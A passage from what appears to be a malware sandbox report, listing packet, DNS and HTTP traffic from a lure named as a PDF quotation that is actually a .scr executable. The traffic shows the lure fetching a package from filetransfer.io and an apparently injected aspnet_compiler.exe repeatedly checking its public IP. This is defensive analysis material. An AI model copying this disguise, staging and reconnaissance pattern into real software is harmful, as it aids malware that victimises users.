Sep 26, 2024 09:24:08.587068081 CEST	443	49722	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:08.635740995 CEST	49722	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:08.644130945 CEST	49722	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:08.691406965 CEST	443	49722	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:08.753200054 CEST	443	49722	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:08.753437042 CEST	443	49722	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:08.754168987 CEST	49722	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:08.768476009 CEST	49722	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:08.774626017 CEST	49721	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:08.780647993 CEST	80	49721	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:08.875153065 CEST	80	49721	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:08.880737066 CEST	49723	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:08.880779028 CEST	443	49723	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:08.881016016 CEST	49723	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:08.881417036 CEST	49723	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:08.881432056 CEST	443	49723	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:08.916987896 CEST	49721	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:09.344171047 CEST	443	49723	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:09.385863066 CEST	49723	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:09.403892994 CEST	49723	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:09.403902054 CEST	443	49723	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:09.511673927 CEST	443	49723	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:09.511768103 CEST	443	49723	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:09.511873960 CEST	49723	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:09.518909931 CEST	49723	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:09.557792902 CEST	49721	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:09.564141989 CEST	80	49721	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:09.565211058 CEST	49721	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:09.566318989 CEST	49724	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:09.571927071 CEST	80	49724	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:09.573236942 CEST	49724	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:09.574687004 CEST	49724	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:09.579672098 CEST	80	49724	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:09.821667910 CEST	49710	80	192.168.2.6	188.114.97.3
Sep 26, 2024 09:24:10.036540985 CEST	80	49724	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:10.037786007 CEST	49725	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:10.037826061 CEST	443	49725	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:10.037897110 CEST	49725	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:10.038280010 CEST	49725	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:10.038289070 CEST	443	49725	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:10.088998079 CEST	49724	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:10.509722948 CEST	443	49725	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:10.511091948 CEST	49725	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:10.511127949 CEST	443	49725	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:10.659065008 CEST	443	49725	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:10.659168005 CEST	443	49725	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:10.659219980 CEST	49725	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:10.659629107 CEST	49725	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:10.662763119 CEST	49724	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:10.663999081 CEST	49727	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:10.667995930 CEST	80	49724	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:10.668049097 CEST	49724	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:10.668833971 CEST	80	49727	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:10.668891907 CEST	49727	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:10.668996096 CEST	49727	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:10.673855066 CEST	80	49727	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:11.135719061 CEST	80	49727	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:11.137037992 CEST	49728	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:11.137080908 CEST	443	49728	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:11.137168884 CEST	49728	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:11.137394905 CEST	49728	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:11.137408972 CEST	443	49728	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:11.182593107 CEST	49727	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:11.597151041 CEST	443	49728	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:11.598499060 CEST	49728	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:11.598516941 CEST	443	49728	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:11.746350050 CEST	443	49728	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:11.746464968 CEST	443	49728	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:11.746575117 CEST	49728	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:11.747402906 CEST	49728	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:11.751709938 CEST	49729	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:11.756724119 CEST	80	49729	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:11.756825924 CEST	49729	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:11.756902933 CEST	49729	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:11.761727095 CEST	80	49729	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:12.240467072 CEST	80	49729	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:12.241681099 CEST	49730	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:12.241727114 CEST	443	49730	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:12.241889000 CEST	49730	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:12.242167950 CEST	49730	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:12.242183924 CEST	443	49730	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:12.291976929 CEST	49729	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:12.715090036 CEST	443	49730	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:12.719610929 CEST	49730	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:12.719635963 CEST	443	49730	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:12.846224070 CEST	443	49730	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:12.846365929 CEST	443	49730	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:12.846457005 CEST	49730	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:12.884553909 CEST	49730	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:12.926213980 CEST	49729	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:12.926837921 CEST	49731	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:12.932277918 CEST	80	49729	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:12.932351112 CEST	49729	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:12.932535887 CEST	80	49731	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:12.932635069 CEST	49731	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:12.936882973 CEST	49731	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:12.941739082 CEST	80	49731	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:13.423831940 CEST	80	49731	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:13.425425053 CEST	49732	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:13.425544977 CEST	443	49732	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:13.425653934 CEST	49732	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:13.425940990 CEST	49732	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:13.425975084 CEST	443	49732	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:13.479664087 CEST	49731	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:13.879364967 CEST	443	49732	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:13.881109953 CEST	49732	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:13.881192923 CEST	443	49732	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:14.010689974 CEST	443	49732	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:14.010798931 CEST	443	49732	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:14.011059999 CEST	49732	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:14.011594057 CEST	49732	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:14.015115976 CEST	49731	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:14.016176939 CEST	49733	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:14.020369053 CEST	80	49731	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:14.020467043 CEST	49731	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:14.021069050 CEST	80	49733	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:14.021158934 CEST	49733	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:14.021230936 CEST	49733	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:14.027554035 CEST	80	49733	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:14.543195963 CEST	80	49733	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:14.544373035 CEST	49734	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:14.544430971 CEST	443	49734	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:14.544508934 CEST	49734	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:14.544734955 CEST	49734	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:14.544748068 CEST	443	49734	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:14.588974953 CEST	49733	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:15.026631117 CEST	443	49734	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:15.028023005 CEST	49734	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:15.028039932 CEST	443	49734	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:15.155863047 CEST	443	49734	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:15.155987978 CEST	443	49734	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:15.156116962 CEST	49734	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:15.156790972 CEST	49734	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:15.160166979 CEST	49733	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:15.161300898 CEST	49735	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:15.165354013 CEST	80	49733	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:15.165443897 CEST	49733	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:15.166168928 CEST	80	49735	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:15.166237116 CEST	49735	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:15.166368008 CEST	49735	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:15.171145916 CEST	80	49735	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:16.007286072 CEST	80	49735	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:16.015923977 CEST	49736	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:16.015968084 CEST	443	49736	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:16.016048908 CEST	49736	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:16.016288042 CEST	49736	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:16.016299963 CEST	443	49736	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:16.057693005 CEST	49735	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:16.500582933 CEST	443	49736	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:16.501952887 CEST	49736	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:16.501982927 CEST	443	49736	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:16.652475119 CEST	443	49736	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:16.652570963 CEST	443	49736	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:16.652637005 CEST	49736	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:16.653209925 CEST	49736	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:25:16.135379076 CEST	80	49727	193.122.130.0	192.168.2.6
Sep 26, 2024 09:25:16.135516882 CEST	49727	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:25:21.006797075 CEST	80	49735	193.122.130.0	192.168.2.6
Sep 26, 2024 09:25:21.006966114 CEST	49735	80	192.168.2.6	193.122.130.0

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 09:23:17.120726109 CEST	53290	53	192.168.2.6	1.1.1.1
Sep 26, 2024 09:23:17.129074097 CEST	53	53290	1.1.1.1	192.168.2.6
Sep 26, 2024 09:23:19.827397108 CEST	50327	53	192.168.2.6	1.1.1.1
Sep 26, 2024 09:23:19.837196112 CEST	53	50327	1.1.1.1	192.168.2.6
Sep 26, 2024 09:24:07.483951092 CEST	55802	53	192.168.2.6	1.1.1.1
Sep 26, 2024 09:24:07.490923882 CEST	53	55802	1.1.1.1	192.168.2.6
Sep 26, 2024 09:24:08.092330933 CEST	61879	53	192.168.2.6	1.1.1.1
Sep 26, 2024 09:24:08.101630926 CEST	53	61879	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 09:23:17.120726109 CEST	192.168.2.6	1.1.1.1	0x3f79	Standard query (0)	filetransfer.io	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:23:19.827397108 CEST	192.168.2.6	1.1.1.1	0x4b21	Standard query (0)	s24.filetransfer.io	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:24:07.483951092 CEST	192.168.2.6	1.1.1.1	0x6429	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:24:08.092330933 CEST	192.168.2.6	1.1.1.1	0xdc4b	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 09:23:17.129074097 CEST	1.1.1.1	192.168.2.6	0x3f79	No error (0)	filetransfer.io		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:23:17.129074097 CEST	1.1.1.1	192.168.2.6	0x3f79	No error (0)	filetransfer.io		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:23:19.837196112 CEST	1.1.1.1	192.168.2.6	0x4b21	No error (0)	s24.filetransfer.io		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:23:19.837196112 CEST	1.1.1.1	192.168.2.6	0x4b21	No error (0)	s24.filetransfer.io		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:24:07.490923882 CEST	1.1.1.1	192.168.2.6	0x6429	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:24:07.490923882 CEST	1.1.1.1	192.168.2.6	0x6429	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:24:07.490923882 CEST	1.1.1.1	192.168.2.6	0x6429	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:24:07.490923882 CEST	1.1.1.1	192.168.2.6	0x6429	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:24:07.490923882 CEST	1.1.1.1	192.168.2.6	0x6429	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:24:07.490923882 CEST	1.1.1.1	192.168.2.6	0x6429	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:24:08.101630926 CEST	1.1.1.1	192.168.2.6	0xdc4b	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:24:08.101630926 CEST	1.1.1.1	192.168.2.6	0xdc4b	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

filetransfer.io

s24.filetransfer.io

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	188.114.97.3	80	6044	C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:23:17.143163919 CEST	95	OUT	GET /data-package/Ky4pZ0WB/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
Sep 26, 2024 09:23:17.800228119 CEST	865	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 26 Sep 2024 07:23:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://filetransfer.io/data-package/Ky4pZ0WB/download CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7WhHY9JZ8Ms6FZAgThsge%2Fnn2z9jRNxxVEfJut4aShncyxmA%2FQ8%2FL314gGEa2NytyLDb4t%2FcZWbTTdODRZ182a5oWiguWGPIZHuCjscm0MLTdT1hU2fjuhAfzMn8WC8d%2BUY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8c9181fab94b41a9-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49721	193.122.130.0	80	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:24:07.501533985 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:24:07.957529068 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:07 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: dbf3e777585df63960781e4d0245857d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:24:07.962793112 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:24:08.067563057 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5a38a1db8cfdbaa5b04755acf7c7b2bd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:24:08.774626017 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:24:08.875153065 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 68adc3046578518187ca9cfe7ac4faa3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49724	193.122.130.0	80	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:24:09.574687004 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:24:10.036540985 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:09 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8f14e4c1f6620edd09ce24d250973583 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49727	193.122.130.0	80	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:24:10.668996096 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:24:11.135719061 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 41d8bd33cb43474a9a1d196d32be88c4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49729	193.122.130.0	80	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:24:11.756902933 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:24:12.240467072 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3b1377feceb8e7544638535b56a9899f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49731	193.122.130.0	80	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:24:12.936882973 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:24:13.423831940 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:13 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 27ea0d1929e975410390d23b4762e995 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49733	193.122.130.0	80	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
